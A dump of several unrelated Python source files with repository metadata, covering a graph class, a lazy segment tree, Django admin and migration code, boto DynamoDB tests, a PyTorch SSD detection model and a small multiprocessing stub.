lower_triangle_ixs = np.tril_indices(n, -1)
adj[lower_triangle_ixs] = adj.T[lower_triangle_ixs]
# Filter the mtx based on the probability of the edges.
adj = (adj < p).astype(dtype=np.int8)
# We can now safely set the new adjacency matrix.
g = Network(directed)
g.set_adj(adj)
return g
@staticmethod
def WSRingLattice(n, k):
"""
Constructs an undirected ring lattice with n nodes, each connected to k neighbors, k/2 on each side.
k should be even.
"""
adj = np.zeros((n, n))
for i in range(n):
for j in range(n):
if 0 < abs(i - j) % (n - 1 - (k // 2)) <= k // 2:
adj[i, j] = 1
g = Network(directed=True)
g.set_adj(adj)
return g
@staticmethod
def FullyConnected(n, directed=False, allow_diagonals=False):
adj = np.ones(n) * (1 - np.eye(n)) + (allow_diagonals * np.eye(n))
g = Network(directed)
g.set_adj(adj)
return g
def __init__(self, directed=False):
self._eta = 100
self._adj = np.zeros(shape=(self._eta, self._eta), dtype=np.int8)
self._n = 0
self._directed = directed
def set_adj(self, adj):
self._adj = adj
self._n = adj.shape[0]
# region Analytics
def degrees(self, kind='any'):
if kind == 'any' or kind == 'in':
return np.sum(self._adj, axis=0)
elif kind == 'out':
return np.sum(self._adj, axis=1)
else:
raise ValueError('Wrong degree kind requested: {}'.format(kind))
def indegrees(self):
return self.degrees(kind='in')
def degree_histogram(self, kind='any'):
degrees = self.degrees(kind)
return np.histogram(degrees, bins=max(degrees))
# endregion
# region Graph manipulation
def batch_add_node(self, n):
for _ in range(n):
self.add_node()
def add_node(self):
self._n += 1
if self._n >= self._node_count():
self._expand()
return self._n - 1
def add_edge(self, i, j):
if (i >= self._n) or (j >= self._n) or (i < 0) or (j < 0):
raise ValueError('Cannot add edge ({}, {})'.format(i, j))
else:
self._adj[i, j] = 1
if not self._directed:
self._adj[j, i] = 1
# endregion
def to_networkx(self):
sanitized_adj = self._adj[:self._n, :self._n]
from networkx import from_numpy_matrix
return from_numpy_matrix(sanitized_adj)
# region Protected
def _node_count(self):
return self._adj.shape[0]
def _expand(self):
self._adj = np.pad(self._adj, ((0, self._eta), (0, self._eta)), mode='constant', constant_values=0)
# endregion
|
[
"[email protected]"
] | |
8e4baaae320644a77b9d51ae74ea221201759574
|
1825283527f5a479204708feeaf55f4ab6d1290b
|
/leetcode/segmented-tree/leon.py
|
9b86c455efa6252c088d2e4fb3ac6b44b59e8988
|
[] |
no_license
|
frankieliu/problems
|
b82c61d3328ffcc1da2cbc95712563355f5d44b5
|
911c6622448a4be041834bcab25051dd0f9209b2
|
refs/heads/master
| 2023-01-06T14:41:58.044871 | 2019-11-24T03:47:22 | 2019-11-24T03:47:22 | 115,065,956 | 1 | 0 | null | 2023-01-04T07:25:52 | 2017-12-22T02:06:57 |
HTML
|
UTF-8
|
Python
| false | false | 6,843 |
py
|
# https://github.com/yuexihan/leonLPST/blob/master/leonLPST.py
from __future__ import division
from six.moves import xrange
class LPSTree:
"""
LPSTree(n[, value=None[, reducef=None[, modulo=None]]]) -> new LPSTree
Build a new LPSTree with n elements.
If value is provided, all elements are set to value, otherwise 0.
Default reduce function is sum. Can alse be set to max or min.
If modulo is provide, modulo operation will be donw automatically.
"""
def __init__(self, n, value=None, reducef=None, modulo=None):
if n <= 0:
raise ValueError("n most be greater than 0")
self.n = n
size = 1;
while(size < n):
size *= 2
size *= 2
self.size = size
self.tree = [None] * size
self.boolset = [False] * size
self.booladd = [False] * size
self.lazyset = [None] * size
self.lazyadd = [None] * size
self.modulo = modulo
if not reducef:
reducef = sum
if reducef == sum:
self.nodef = (lambda val, n: val*n)
elif reducef == max or reducef == min:
self.nodef = (lambda val, n: val)
else:
raise ValueError("reducef can only be sum, max or min")
if self.modulo:
self.reducef = lambda x: reducef(x) % self.modulo
else:
self.reducef = reducef
if value != None:
array = [value] * n
else:
array = [0] * n
def construct(tree, array, sleft, sright, v):
if sleft+1 == sright:
tree[v] = array[sleft]
return tree[v]
smid = (sleft + sright) // 2
tree[v] = self.reducef((construct(tree, array, sleft, smid, 2*v+1),
construct(tree, array, smid, sright, 2*v+2)))
# if self.modulo:
# tree[v] %= self.modulo
# print tree
return tree[v]
construct(self.tree, array, 0, n, 0)
def __len__(self):
return self.n
def _lazypropagate(self, v, vleft, vright):
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
vmid = (vleft + vright) // 2
# print tree, v, tree[2*v+1], boolset[v], booladd[v]
if boolset[v]:
tree[2*v+1] = self.nodef(lazyset[v], vmid-vleft)
tree[2*v+2] = self.nodef(lazyset[v], vright-vmid)
if self.modulo:
tree[2*v+1] %= self.modulo
tree[2*v+2] %= self.modulo
boolset[2*v+1] = boolset[2*v+2] = True
booladd[2*v+1] = booladd[2*v+2] = False
lazyset[2*v+1] = lazyset[2*v+2] = lazyset[v]
boolset[v] = False
if booladd[v]:
tree[2*v+1] += self.nodef(lazyadd[v], vmid-vleft)
tree[2*v+2] += self.nodef(lazyadd[v], vright-vmid)
if self.modulo:
tree[2*v+1] %= self.modulo
tree[2*v+2] %= self.modulo
if booladd[2*v+1]:
lazyadd[2*v+1] += lazyadd[v]
else:
booladd[2*v+1] = True
lazyadd[2*v+1] = lazyadd[v]
if booladd[2*v+2]:
lazyadd[2*v+2] += lazyadd[v]
else:
booladd[2*v+2] = True
lazyadd[2*v+2] = lazyadd[v]
booladd[v] = False
# print tree, v, tree[2*v+1]
def get(self, start, stop):
"""
LPSTree.get(start, stop) -> value
You can assume it same as reduce(reducef, tree[start:stop]).
"""
n = self.n
if not(start < stop and start >=0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _get(sleft, sright, v, vleft, vright):
# print v, start, stop, vleft, vright, tree
if sleft>=vright or sright <= vleft:
return
if sleft<=vleft and sright >= vright:
# if self.modulo:
# tree[v] %= self.modulo
return tree[v]
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
# print v, start, stop, vleft, vright, tree
return self.reducef([x for x in
(_get(sleft, sright, 2*v+1, vleft, vmid),
_get(sleft, sright, 2*v+2, vmid, vright))
if x != None])
return _get(start, stop, 0, 0, n)
def set(self, start, stop, value):
"""
LPSTRee.set(start, stop, value)
Set all elements in [start, stop) to value.
"""
n = self.n
if not(start < stop and start >=0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _set(sleft, sright, v, vleft, vright, value):
# print v, start, stop, vleft, vright, value, tree
if sleft >= vright or sright <= vleft:
return
if sleft <= vleft and sright >= vright:
tree[v] = self.nodef(value, vright-vleft)
if self.modulo:
tree[v] %= self.modulo
boolset[v] = True
booladd[v] = False
lazyset[v] = value
# print v, tree, tree[v], tree[v] % self.modulo
return
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
_set(sleft, sright, 2*v+1, vleft, vmid, value)
_set(sleft, sright, 2*v+2, vmid, vright, value)
tree[v] = self.reducef((tree[2*v+1], tree[2*v+2]))
# if self.modulo:
# tree[v] %= self.modulo
# print v, start, stop, vleft, vright, value, tree
_set(start, stop, 0, 0, n, value)
def add(self, start, stop, diff):
"""
LPSTRee.add(start, stop, diff)
Add diff to all elements in [start, stop).
"""
n = self.n
if not(start < stop and start >=0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _add(sleft, sright, v, vleft, vright, diff):
if sleft >= vright or sright <= vleft:
return
if sleft <= vleft and sright >= vright:
tree[v] += self.nodef(diff, vright-vleft)
if self.modulo:
tree[v] %= self.modulo
if booladd[v]:
lazyadd[v] += diff
else:
booladd[v] = True
lazyadd[v] = diff
return
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
_add(sleft, sright, 2*v+1, vleft, vmid, diff)
_add(sleft, sright, 2*v+2, vmid, vright, diff)
tree[v] = self.reducef((tree[2*v+1], tree[2*v+2]))
# if self.modulo:
# tree[v] %= self.modulo
_add(start, stop, 0, 0, n, diff)
def __getitem__(self, index):
return self.get(index, index+1)
def __setitem__(self, index, value):
self.set(index, index+1, value)
def __repr__(self):
return repr([self[x] for x in xrange(self.n)])
def tolist(self):
"""
LPSTree.tolist() -> a list object
Return a list containing all the elements in LPSTree.
"""
return [self[x] for x in xrange(self.n)]
if __name__ == '__main__':
tree = LPSTree(10, reducef=max)
# tree = LPSTree(10, modulo=2)
# tree = LPSTree(10)
print tree.n, tree.size
print tree.get(0, 10)
print tree[0], tree[1]
tree[9] = 20
print tree
print tree.get(0, 10)
tree.set(1,5,5)
print tree
tree.add(1, 10, 12)
print tree
tree.set(0, 3, 5)
tree.add(0, 4, 2)
print tree
tree.set(0, 10, 0)
print tree
tree.add(1, 9, -10)
print tree
print tree.get(8, 9)
tree.set(0, 3, 9)
print tree
tree = LPSTree(10, reducef=max)
print tree
# tree.set(0, 10, 0)
# help(tree.set)
tree.set(1, 9, -10)
print tree
|
[
"[email protected]"
] | |
8b8ae1ce63eaacc0031ba4341ad0dbf893504805
|
671fae9e18f50db3b147b3087e30f304d832fb97
|
/TMS/accounts/admin.py
|
5c51c9534c829e7974e32b355d2b29d8cf2fea56
|
[] |
no_license
|
shivasupraj/Employee-Time-Management-Application
|
745375dd06e57c35239282dabd011731a483ed52
|
aa2eecad1a4ae6b6621d40ab17954e30a7c4657a
|
refs/heads/master
| 2021-10-03T10:49:33.751181 | 2018-12-03T00:40:28 | 2018-12-03T00:40:28 | 125,914,418 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 193 |
py
|
from django.contrib import admin
from . import models
# Register your models here.
admin.site.register(models.Profile)
admin.site.register(models.Project)
admin.site.register(models.TimeSheet)
|
[
"[email protected]"
] | |
b05acce5674d36ac8d553f00d5fe010f2061fbdf
|
612325535126eaddebc230d8c27af095c8e5cc2f
|
/depot_tools/external_bin/gsutil/gsutil_4.15/gsutil/third_party/boto/tests/unit/dynamodb/test_types.py
|
e3b913d7eb4a7e8789aa9a1becd8cefa58b17d6a
|
[
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
TrellixVulnTeam/proto-quic_1V94
|
1a3a03ac7a08a494b3d4e9857b24bb8f2c2cd673
|
feee14d96ee95313f236e0f0e3ff7719246c84f7
|
refs/heads/master
| 2023-04-01T14:36:53.888576 | 2019-10-17T02:23:04 | 2019-10-17T02:23:04 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,427 |
py
|
#!/usr/bin/env python
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from decimal import Decimal
from tests.compat import unittest
from boto.compat import six
from boto.dynamodb import types
from boto.dynamodb.exceptions import DynamoDBNumberError
class TestDynamizer(unittest.TestCase):
def setUp(self):
pass
def test_encoding_to_dynamodb(self):
dynamizer = types.Dynamizer()
self.assertEqual(dynamizer.encode('foo'), {'S': 'foo'})
self.assertEqual(dynamizer.encode(54), {'N': '54'})
self.assertEqual(dynamizer.encode(Decimal('1.1')), {'N': '1.1'})
self.assertEqual(dynamizer.encode(set([1, 2, 3])),
{'NS': ['1', '2', '3']})
self.assertIn(dynamizer.encode(set(['foo', 'bar'])),
({'SS': ['foo', 'bar']}, {'SS': ['bar', 'foo']}))
self.assertEqual(dynamizer.encode(types.Binary(b'\x01')),
{'B': 'AQ=='})
self.assertEqual(dynamizer.encode(set([types.Binary(b'\x01')])),
{'BS': ['AQ==']})
self.assertEqual(dynamizer.encode(['foo', 54, [1]]),
{'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]})
self.assertEqual(dynamizer.encode({'foo': 'bar', 'hoge': {'sub': 1}}),
{'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}})
self.assertEqual(dynamizer.encode(None), {'NULL': True})
self.assertEqual(dynamizer.encode(False), {'BOOL': False})
def test_decoding_to_dynamodb(self):
dynamizer = types.Dynamizer()
self.assertEqual(dynamizer.decode({'S': 'foo'}), 'foo')
self.assertEqual(dynamizer.decode({'N': '54'}), 54)
self.assertEqual(dynamizer.decode({'N': '1.1'}), Decimal('1.1'))
self.assertEqual(dynamizer.decode({'NS': ['1', '2', '3']}),
set([1, 2, 3]))
self.assertEqual(dynamizer.decode({'SS': ['foo', 'bar']}),
set(['foo', 'bar']))
self.assertEqual(dynamizer.decode({'B': 'AQ=='}), types.Binary(b'\x01'))
self.assertEqual(dynamizer.decode({'BS': ['AQ==']}),
set([types.Binary(b'\x01')]))
self.assertEqual(dynamizer.decode({'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]}),
['foo', 54, [1]])
self.assertEqual(dynamizer.decode({'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}}),
{'foo': 'bar', 'hoge': {'sub': 1}})
self.assertEqual(dynamizer.decode({'NULL': True}), None)
self.assertEqual(dynamizer.decode({'BOOL': False}), False)
def test_float_conversion_errors(self):
dynamizer = types.Dynamizer()
# When supporting decimals, certain floats will work:
self.assertEqual(dynamizer.encode(1.25), {'N': '1.25'})
# And some will generate errors, which is why it's best
# to just use Decimals directly:
with self.assertRaises(DynamoDBNumberError):
dynamizer.encode(1.1)
def test_non_boolean_conversions(self):
dynamizer = types.NonBooleanDynamizer()
self.assertEqual(dynamizer.encode(True), {'N': '1'})
def test_lossy_float_conversions(self):
dynamizer = types.LossyFloatDynamizer()
# Just testing the differences here, specifically float conversions:
self.assertEqual(dynamizer.encode(1.1), {'N': '1.1'})
self.assertEqual(dynamizer.decode({'N': '1.1'}), 1.1)
self.assertEqual(dynamizer.encode(set([1.1])),
{'NS': ['1.1']})
self.assertEqual(dynamizer.decode({'NS': ['1.1', '2.2', '3.3']}),
set([1.1, 2.2, 3.3]))
class TestBinary(unittest.TestCase):
def test_good_input(self):
data = types.Binary(b'\x01')
self.assertEqual(b'\x01', data)
self.assertEqual(b'\x01', bytes(data))
def test_non_ascii_good_input(self):
# Binary data that is out of ASCII range
data = types.Binary(b'\x88')
self.assertEqual(b'\x88', data)
self.assertEqual(b'\x88', bytes(data))
@unittest.skipUnless(six.PY2, "Python 2 only")
def test_bad_input(self):
with self.assertRaises(TypeError):
types.Binary(1)
@unittest.skipUnless(six.PY3, "Python 3 only")
def test_bytes_input(self):
data = types.Binary(1)
self.assertEqual(data, b'\x00')
self.assertEqual(data.value, b'\x00')
@unittest.skipUnless(six.PY2, "Python 2 only")
def test_unicode_py2(self):
# It's dirty. But remains for backward compatibility.
data = types.Binary(u'\x01')
self.assertEqual(data, b'\x01')
self.assertEqual(bytes(data), b'\x01')
# Delegate to built-in b'\x01' == u'\x01'
# In Python 2.x these are considered equal
self.assertEqual(data, u'\x01')
# Check that the value field is of type bytes
self.assertEqual(type(data.value), bytes)
@unittest.skipUnless(six.PY3, "Python 3 only")
def test_unicode_py3(self):
with self.assertRaises(TypeError):
types.Binary(u'\x01')
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
a56ba42731fa60638172e5e3a581d2f14f7d8df7
|
6b4fbd5104f9f48590b409fbe76fee059823a51c
|
/models/drf_res.py
|
152e9c9f281a7d8e2fe81315ce95c3f612737863
|
[
"MIT"
] |
permissive
|
sebastiani/SSD_Pytorch
|
655f59a51a7c1ef20493f0b9284ecd4eeae490cd
|
98be17f15a863f25adfe70c86938db82ff2a8786
|
refs/heads/master
| 2020-04-07T01:05:57.114451 | 2018-10-18T01:16:56 | 2018-10-18T01:16:56 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,573 |
py
|
# -*- coding: utf-8 -*-
# Written by yq_yao
import torch
import torch.nn as nn
import torch.nn.functional as F
import models.dense_conv
from torch.autograd import Variable
from utils.box_utils import weights_init
def add_extras(size, in_channel, batch_norm=False):
layers = []
layers += [nn.Conv2d(in_channel, 256, kernel_size=1, stride=1)]
layers += [nn.Conv2d(256, 256, kernel_size=3, stride=2, padding=1)]
layers += [nn.Conv2d(256, 128, kernel_size=1, stride=1)]
layers += [nn.Conv2d(128, 256, kernel_size=3, stride=2, padding=1)]
if size == '300':
layers += [nn.Conv2d(256, 128, kernel_size=1, stride=1)]
layers += [nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=0)]
else:
layers += [nn.Conv2d(256, 128, kernel_size=1, stride=1)]
layers += [nn.Conv2d(128, 256, kernel_size=3, stride=2, padding=1)]
layers += [nn.Conv2d(256, 128, kernel_size=1, stride=1)]
layers += [nn.Conv2d(128, 256, kernel_size=3, stride=2, padding=1)]
return layers
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,
stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, self.expansion *
planes, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(self.expansion*planes)
self.downsample = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.downsample = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.downsample(x)
out = F.relu(out)
return out
class DenseSSDResnet(nn.Module):
def __init__(self, block, num_blocks, size='300', channel_size='48'):
super(DenseSSDResnet, self).__init__()
self.in_planes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=7,
stride=2, padding=3, bias=False)
self.bn1 = nn.BatchNorm2d(64)
# Bottom-up layers
self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
self.extras = nn.ModuleList(add_extras(str(size), 2048))
dense_list = models.dense_conv.dense_list_res(channel_size, size)
self.dense_list0 = nn.ModuleList(dense_list[0])
self.dense_list1 = nn.ModuleList(dense_list[1])
self.dense_list2 = nn.ModuleList(dense_list[2])
self.dense_list3 = nn.ModuleList(dense_list[3])
self.dense_list4 = nn.ModuleList(dense_list[4])
self.dense_list5 = nn.ModuleList(dense_list[5])
self.smooth1 = nn.Conv2d(2048, 512, kernel_size=3, stride=1, padding=1)
self._init_modules()
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def _init_modules(self):
self.extras.apply(weights_init)
self.dense_list0.apply(weights_init)
self.dense_list1.apply(weights_init)
self.dense_list2.apply(weights_init)
self.dense_list3.apply(weights_init)
self.dense_list4.apply(weights_init)
self.dense_list5.apply(weights_init)
self.smooth1.apply(weights_init)
def forward(self, x):
# Bottom-up
c1 = F.relu(self.bn1(self.conv1(x)))
c1 = F.max_pool2d(c1, kernel_size=3, stride=2, padding=1)
c2 = self.layer1(c1)
dense1_p1 = self.dense_list0[0](c2)
dense1_p2 = self.dense_list0[1](dense1_p1)
dense1_p3 = self.dense_list0[2](dense1_p2)
dense1_p1_conv = self.dense_list0[3](dense1_p1)
dense1_p2_conv = self.dense_list0[4](dense1_p2)
dense1_p3_conv = self.dense_list0[5](dense1_p3)
c3 = self.layer2(c2)
dense2_p1 = self.dense_list1[0](c3)
dense2_p2 = self.dense_list1[1](dense2_p1)
dense2_p3 = self.dense_list1[2](dense2_p2)
dense2_p1_conv = self.dense_list1[3](dense2_p1)
dense2_p2_conv = self.dense_list1[4](dense2_p2)
dense2_p3_conv = self.dense_list1[5](dense2_p3)
c4 = self.layer3(c3)
dense3_up_conv = self.dense_list2[0](c4)
dense3_up = self.dense_list2[1](dense3_up_conv)
dense3_p1 = self.dense_list2[2](c4)
dense3_p2 = self.dense_list2[3](dense3_p1)
dense3_p1_conv = self.dense_list2[4](dense3_p1)
dense3_p2_conv = self.dense_list2[5](dense3_p2)
c5 = self.layer4(c4)
c5_ = self.smooth1(c5)
dense4_up1_conv = self.dense_list3[0](c5)
dense4_up2_conv = self.dense_list3[1](c5)
dense4_up1 = self.dense_list3[2](dense4_up1_conv)
dense4_up2 = self.dense_list3[3](dense4_up2_conv)
dense4_p = self.dense_list3[4](c5)
dense4_p_conv = self.dense_list3[5](dense4_p)
p6 = F.relu(self.extras[0](c5), inplace=True)
p6 = F.relu(self.extras[1](p6), inplace=True)
x = p6
dense5_up1_conv = self.dense_list4[0](p6)
dense5_up2_conv = self.dense_list4[1](p6)
dense5_up3_conv = self.dense_list4[2](p6)
dense5_up1 = self.dense_list4[3](dense5_up1_conv)
dense5_up2 = self.dense_list4[4](dense5_up2_conv)
dense5_up3 = self.dense_list4[5](dense5_up3_conv)
dense_out1 = torch.cat(
(dense1_p1_conv, c3, dense3_up, dense4_up2, dense5_up3), 1)
dense_out1 = F.relu(self.dense_list5[0](dense_out1))
dense_out2 = torch.cat(
(dense1_p2_conv, dense2_p1_conv, c4, dense4_up1, dense5_up2), 1)
dense_out2 = F.relu(self.dense_list5[1](dense_out2))
dense_out3 = torch.cat(
(dense1_p3_conv, dense2_p2_conv, dense3_p1_conv, c5_, dense5_up1), 1)
dense_out3 = F.relu(self.dense_list5[2](dense_out3))
dense_out4 = torch.cat(
(dense2_p3_conv, dense3_p2_conv, dense4_p_conv, p6), 1)
dense_out4 = F.relu(self.dense_list5[3](dense_out4))
sources = [dense_out1, dense_out2, dense_out3, dense_out4]
# apply extra layers and cache source layer outputs
for k, v in enumerate(self.extras):
if k > 1:
x = F.relu(v(x), inplace=True)
if k % 2 == 1:
sources.append(x)
return sources
def DRFSSDRes50(size, channel_size='48'):
return DenseSSDResnet(Bottleneck, [3, 4, 6, 3], size, channel_size)
def DRFSSDRes101(size, channel_size='48'):
return DenseSSDResnet(Bottleneck, [3, 4, 23, 3], size, channel_size)
def DRFSSDRes152(size, channel_size='48'):
return DenseSSDResnet(Bottleneck, [3, 8, 36, 3], size, channel_size)
|
[
"[email protected]"
] | |
81b968c9d9e14ff5772ae28bead91e71f66173d8
|
50e2012ecea8307e278d1132ca0094adb940aff2
|
/lib/review/my_process/my_multiprocessing.py
|
a299b8a3185df0bb568f1c9bc93484f95d15cfcb
|
[] |
no_license
|
Lewescaiyong/my_library
|
6689cae2db4aaa980b4bd5ed9f21691eefbff2fe
|
35d0d29097823ccef74fa29ca8756a7f59ceeb78
|
refs/heads/master
| 2020-11-25T09:20:56.484275 | 2019-12-17T10:58:20 | 2019-12-17T10:58:20 | 228,593,219 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 182 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
from multiprocessing.dummy import Pool
pool1 = multiprocessing.Pool()
pool2 = Pool()
pool1.map()
pool2.map()
|
[
"[email protected]"
] | |
50845d3ddab1ec682e0f345e3c75c1ba47438990
|
ed872a0efb1db283f48176474e22f4c4ad31db79
|
/src/accounts/migrations/0019_fix_socail_auth.py
|
ceffd3defcff51b96d673f95e0fffd2933671048
|
[] |
no_license
|
barontxu/djbookru
|
34c2bf90e5d3542e4cbd2f3e600e1c0a12795d35
|
388bff0491e961f8efdf3cabd6c47d9fa2988547
|
refs/heads/master
| 2021-01-16T20:39:33.949315 | 2014-06-20T12:22:56 | 2014-06-20T12:22:56 | 23,031,683 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,111 |
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
depends_on = (
('social_auth', '0002_auto__add_unique_nonce_timestamp_salt_server_url__add_unique_associati'),
)
def forwards(self, orm):
"Write your forwards methods here."
orm['social_auth.UserSocialAuth'].objects.filter(provider='google').delete()
def backwards(self, orm):
"Write your backwards methods here."
models = {
'accounts.achievement': {
'Meta': {'object_name': 'Achievement'},
'active_icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inactive_icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'accounts.announcement': {
'Meta': {'object_name': 'Announcement'},
'content': ('django.db.models.fields.TextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'accounts.emailconfirmation': {
'Meta': {'object_name': 'EmailConfirmation'},
'confirmation_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sent': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.User']"})
},
'accounts.user': {
'Meta': {'object_name': 'User', '_ormbases': ['auth.User']},
'achievements': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['accounts.Achievement']", 'through': "orm['accounts.UserAchievement']", 'symmetrical': 'False'}),
'biography': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'homepage': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'is_valid_email': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_comments_read': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_doc_comments_read': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'lat': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'lng': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'signature': ('django.db.models.fields.TextField', [], {'max_length': '1024', 'blank': 'True'}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'})
},
'accounts.userachievement': {
'Meta': {'unique_together': "(('user', 'achievement'),)", 'object_name': 'UserAchievement'},
'achievement': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.Achievement']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'note': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.User']"})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '75'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
